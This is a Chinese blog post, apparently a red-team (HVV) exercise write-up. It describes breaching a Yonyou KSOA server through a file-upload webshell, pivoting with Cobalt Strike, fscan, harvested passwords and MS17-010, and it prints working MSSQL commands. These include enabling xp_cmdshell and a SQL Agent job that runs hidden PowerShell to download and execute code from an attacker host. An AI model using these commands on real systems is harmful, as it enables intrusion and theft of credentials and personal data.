记某次HVV:文件上传打入内网

最新推荐文章于 2024-06-14 13:37:46 发布
最新推荐文章于 2024-06-14 13:37:46 发布
阅读量781 收藏 15
点赞数 14
文章标签: 网络 渗透测试 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32277727/article/details/136732035
版权

免责声明

本文仅用于参考和学习交流,对于使用本文所提供的信息所造成的任何直接或间接的后果和损失,使用者需自行承担责任。本文的作者对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢!

前言

某次地市hvv发现一个某友文件上传漏洞,通过扫描内网网段,发现大量数据库弱口令,主机密码复用,及MS-17010。

个人认为本文比较重要的是mssql通过Agent Job执行无回显命令上线CS(我试了好几种最后就这个成功了),还有翻数据(数据库,照片或者表格)和密码本(桌面应用程序抓密码、txt\xlsx\doc等文档、浏览器历史密码),内网渗透主打就是一个认真仔细,登上内网机器一定要翻个底朝天。

由于数据敏感性,这里只截取一些片段讲解,给大家提供一个思路。

正文

用友文件上传漏洞

Fofa语法:app=“用友-时空KSOA” &&city=“城市/地区”

恰好,逮到一个文件上传,上传天蝎马。

1708954999_65dc95778bee551257be6.png!small?1708955000411

连接webshell。

1708955035_65dc959b64e4b6150a598.png!small?1708955036202

上线CS

上传免杀马上线CS,使用CS自带插件提权到system权限。

1708955073_65dc95c10b3d13665bf53.png!small?1708955074093

使用CS插件,开启3389端口,增加一个管理员用户,建立隧道然后远程连接该主机。

1708955109_65dc95e514ccdaeb1349f.png!small?1708955109861

接下来就是在这台机器上,翻数据和密码,这里就不截图了。

最后上传fscan,在这台机器上扫描B段资产或C段资产,为后续打内网其他机器做好信息收集工作。

数据库弱口令到上线CS

在第二步的信息收集中,找到一个某桌面应用程序,上传星号密码查看器,抓取到另一台主机的mssql数据库密码。

在第二步的信息收集中,找到一个某桌面应用程序,上传星号密码查看器,抓取到另一台主机的mssql数据库密码。

1708955212_65dc964cc142a5ab25675.png!small?1708955213566

连接数据库,使用xp_cmdshell进行提权

#开启xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;-- 开启xp_cmdshell
#命令执行
EXEC master…xp_cmdshell ‘whoami’
#关闭xp_cmdshell
EXEC sp_configure ‘show advanced options’, 0;RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;
EXEC sp_configure ‘show advanced options’, 0; GO RECONFIGURE; – 禁用advanced options

1708955288_65dc96982e4ff4d588ac5.png!small?1708955288899

通过Agent Job执行无回显命令上线CS

USE msdb; EXEC dbo.sp_add_job @job_name = N’test_powershell_job1’; EXEC sp_add_jobstep @job_name = N’test_powershell_job1’,@step_name = N’test_powershell_name1’, @subsystem = N’PowerShell’,@command = N’powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(“http://X.X.X.X:80/a”))”‘, @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N’test_powershell_job1’; EXEC dbo.sp_start_job N’test_powershell_job1’; //X.X.X.X为攻击鸡地址

1708955333_65dc96c527bd529d94b55.png!small?1708955334198

接着继续翻这台机器上的数据和密码,我翻到小4W条用户名、地址、密码等敏感信息,这里不截图了。

MS17-010上线CS

通过fscan扫描B段的信息收集结果,打了一个MS17-010。

msf使用ms17-010攻击模块攻击,进入到shell模式后,使用powershell方式上线CS。

1708955369_65dc96e9245ec09b20466.png!small?1708955370079

1708955391_65dc96ff5d1a683e1d357.png!small?1708955392107

接着的思路和上面的一样,就是增管理员用户,开3389,远程连接,继续翻密码还有数据。

黑战士安全
关注
  • 14
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
hvv-rest:汉堡公共交通的HTTP API
05-23
hvv-rest是一种公共交通REST API ,是的干净替代方案。 它部署在 。 安装和运行 hvv-rest期望服务器在127.0.0.1:6379 (默认端口)上运行,但是您可以设置REDIS_URL环境变量来更改此设置。 通过Docker Docker映像 ...
CaijiOrz#2021_Hvv#和信创天云桌面文件上传1
07-25
描述存在某接口可被攻击者利用上传文件利用上传访问。
某次HVV:通过sql注入打入内网
weixin_44217321的博客
01-19 317
某次hvv打点遇到的,这里我用靶场作为演示为大家提供一个sqlmap注入后,找网站绝对路径的思路。
某次HVV:用友文件上传打穿内网
weixin_44217321的博客
02-26 586
某次地市hvv发现一个某友文件上传漏洞,通过扫描内网网段,发现大量数据库弱口令,主机密码复用,及MS-17010。 个人认为本文比较重要的是mssql通过Agent Job执行无回显命令上线CS(我试了好几种最后就这个成功了),还有翻数据(数据库,照片或者表格)和密码本(桌面应用程序抓密码、txt\xlsx\doc等文档、浏览器历史密码),内网渗透主打就是一个认真仔细,登上内网机器一定要翻个底朝天。 由于数据敏感性,这里只截取一些片段讲解,给大家提供一个思路。
某次HVV:通过windows特性获取内网权限
weixin_44217321的博客
01-16 463
前段时间参加了某地HVV行动,取得了不错的成绩,故开篇录一下在HVV中遇到的一些好的思路。此篇为HVV合集的第一篇,后续有好的思路会继续分享给大家。
一次蓝初HVV面试
m0_74271951的博客
04-19 1456
蓝初HVV面试
【面试】一次HVV蓝队中级(面试题)
今天是几号的博客
04-23 2024
动态免杀方面需要补一下、应急响应方面知识没有构成系统,讲的有点乱。@[TOC](文章目录) # 使用过安全设备吗?使用过程中发现过真实攻击行为吗? # SRC经验 # 网络攻防CTF经历 # Web OWasp Top10 # 常见webshell特征(内存马特征) # Goby在用什么版本?(这是没想到的) # Sqlmap参数 # Burpsuite常用插件 # MSF生成木马命令行(msfvenom 这问题也是我没想到的) # 动态免杀(这里要补一下了,不太熟悉) # mimikaze使用
2023HVV(第1-15天)
Nolen_Alice的博客
08-11 3654
录一下HVV的一些个人收获
【杂谈分享】关于我去HVV当猴子这件事——HVV
Bossfrank的博客
08-26 692
HVV闲聊而已,读者图一乐就好。
关于一次hvv面经的小分享
m0_58116751的博客
05-15 242
对要注入的命令进行加密或混淆:将命令注入到目标进程的内存中:如果目标系统存在已知的漏洞或后门。
面试经验分享 | 第一次hvv面试
zkaq7777777的博客
06-04 345
(我是这么回答的IDS和WAF都是用特征库匹配,强大与否就在于特征库是否强大,但是WAF还有一些其他功能可以设置白名单,防止页面串改,WAF还具备一定自主学习功能,能对不同的编码方式做强制多重转换还原称攻击铭文,把变形后的字符组合后再分析,之前看过一篇文章,他把IDS比作大楼的保安,WAF比作个人的保镖,WAF应该更具有针对性)之后我提交的简历就是学院发的简历模板,然后自己修改了一些,添加了一些项目经历上个学期有一个正经的经历,就是挖一个网站的漏洞,我找到一个管理界面的弱口令,和一个登录界面的逻辑漏洞。
2024最新:Hvv中常见的面试问题
03-11
国护网常见的面试问题,十年国护经验总结,帮助你通关国护网面试。
HVV面试的总结(超级详细)
06-03
HVV面试宝典
HVVGTI:HVV Geofox API 的 Java API 客户端
06-16
HVVGTI API 客户端这是 Hochbahn Hamburg 使用的 HVV Geofox API 的私有示例 API 实现。
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
06-14 239
nc网络收发测试-tcp客户端
面向云计算平台的信息安全等级保护测评实践与建议
ddcajdkdl的博客
06-14 539
面向云计算平台的信息安全等级保护测评是一项系统工程,需要政府、云服务商、用户及第三方测评机构等多方共同努力,通过持续的技术创新与管理优化,确保云计算环境下的信息安全,为数字经济发展提供坚实的安全保障。
计算机网络(6) ICMP协议
最新发布
qq_42761215的博客
06-14 327
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
2023 hvv poc
08-22
很抱歉,根据提供的引用内容,我没有找到关于"2023 hvv poc"的相关信息。是否可以提供更多的详细信息或引用内容,以便我可以更好地回答您的问题?<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [2023HVV最新0day、1day消息含POC、EXP](https://blog.csdn.net/tangshuangsss/article/details/132222580)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【漏洞篇】面试·HVV专题](https://blog.csdn.net/Gherbirthday0916/article/details/124035907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值